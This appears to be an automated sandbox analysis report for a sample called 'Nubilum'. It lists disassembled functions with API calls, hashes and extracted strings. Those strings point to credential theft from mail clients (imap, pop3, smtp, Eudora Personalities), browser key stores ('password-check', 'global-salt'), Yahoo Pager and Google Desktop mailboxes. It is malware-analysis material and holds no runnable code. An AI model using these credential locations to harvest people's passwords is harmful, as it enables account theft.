                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _strcmpi$memcpystrlen
                          • String ID: imap$pop3$smtp
                          • API String ID: 2025310588-821077329
                          • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                          • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                          • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                          • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                          APIs
                          • memset.MSVCRT ref: 0040C02D
                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                            • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                            • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                            • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                            • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                            • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                            • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                          • API String ID: 2726666094-3614832568
                          • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                          • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                          • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                          • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                          APIs
                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                          • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                          • OpenClipboard.USER32(?), ref: 0040C1B1
                          • GetLastError.KERNEL32 ref: 0040C1CA
                          • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                          • String ID:
                          • API String ID: 2014771361-0
                          • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                          • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                          • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                          • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                          APIs
                          • memcmp.MSVCRT ref: 00406151
                            • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                            • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                            • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                          • memcmp.MSVCRT ref: 0040617C
                          • memcmp.MSVCRT ref: 004061A4
                          • memcpy.MSVCRT ref: 004061C1
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcmp$memcpy
                          • String ID: global-salt$password-check
                          • API String ID: 231171946-3927197501
                          • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                          • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                          • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                          • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                          APIs
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                          • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                          • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                          • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                          APIs
                          • memset.MSVCRT ref: 0040644F
                          • memcpy.MSVCRT ref: 00406462
                          • memcpy.MSVCRT ref: 00406475
                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                            • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                            • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                          • memcpy.MSVCRT ref: 004064B9
                          • memcpy.MSVCRT ref: 004064CC
                          • memcpy.MSVCRT ref: 004064F9
                          • memcpy.MSVCRT ref: 0040650E
                            • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID:
                          • API String ID: 438689982-0
                          • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                          • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                          • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                          • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                          APIs
                            • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                          • memset.MSVCRT ref: 0040330B
                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                          • strchr.MSVCRT ref: 0040335A
                            • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                          • strlen.MSVCRT ref: 0040339C
                            • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                          • String ID: Personalities
                          • API String ID: 2103853322-4287407858
                          • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                          • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                          • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                          • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                          APIs
                          • memset.MSVCRT ref: 00444573
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValuememset
                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                          • API String ID: 1830152886-1703613266
                          • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                          • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                          • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                          • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: winRead
                          • API String ID: 1297977491-2759563040
                          • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                          • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                          • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                          • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: gj
                          • API String ID: 1297977491-4203073231
                          • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                          • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                          • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                          • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                          APIs
                          • GetParent.USER32(?), ref: 004090C2
                          • GetWindowRect.USER32(?,?), ref: 004090CF
                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientParentPoints
                          • String ID:
                          • API String ID: 4247780290-0
                          • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                          • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                          • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                          • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _strcmpi$_mbscpy
                          • String ID: smtp
                          • API String ID: 2625860049-60245459
                          • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                          • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                          • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                          • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                          APIs
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                          • memset.MSVCRT ref: 00408258
                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                          Strings
                          • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Close$EnumOpenmemset
                          • String ID: Software\Google\Google Desktop\Mailboxes
                          • API String ID: 2255314230-2212045309
                          • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                          • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                          • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                          • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                          APIs
                          • memset.MSVCRT ref: 0040C28C
                          • SetFocus.USER32(?,?), ref: 0040C314
                            • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FocusMessagePostmemset
                          • String ID: S_@$l
                          • API String ID: 3436799508-4018740455
                          • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                          • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                          • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                          • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _mbscpy
                          • String ID: C^@$X$ini
                          • API String ID: 714388716-917056472
                          • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                          • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                          • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                          • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                          APIs
                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                          • String ID: MS Sans Serif
                          • API String ID: 3492281209-168460110
                          • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                          • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                          • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                          • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ClassName_strcmpimemset
                          • String ID: edit
                          • API String ID: 275601554-2167791130
                          • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                          • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                          • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                          • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                          APIs
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@$memset
                          • String ID:
                          • API String ID: 1860491036-0
                          • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                          • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                          • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                          • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                          APIs
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$memcpy
                          • String ID:
                          • API String ID: 368790112-0
                          • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                          • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                          • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                          • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                          APIs
                          Strings
                          • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                          • too many SQL variables, xrefs: 0042C6FD
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                          • API String ID: 2221118986-515162456
                          • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                          • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                          • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                          • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                          APIs
                            • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                            • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                          • strlen.MSVCRT ref: 0040B60B
                          • atoi.MSVCRT ref: 0040B619
                          • _mbsicmp.MSVCRT ref: 0040B66C
                          • _mbsicmp.MSVCRT ref: 0040B67F
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _mbsicmp$??2@??3@atoistrlen
                          • String ID:
                          • API String ID: 4107816708-0
                          • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                          • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                          • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                          • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                          APIs
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                          • String ID:
                          • API String ID: 1886415126-0
                          • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                          • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                          • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                          • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: >$>$>
                          • API String ID: 39653677-3911187716
                          • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                          • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                          • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                          • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                          APIs
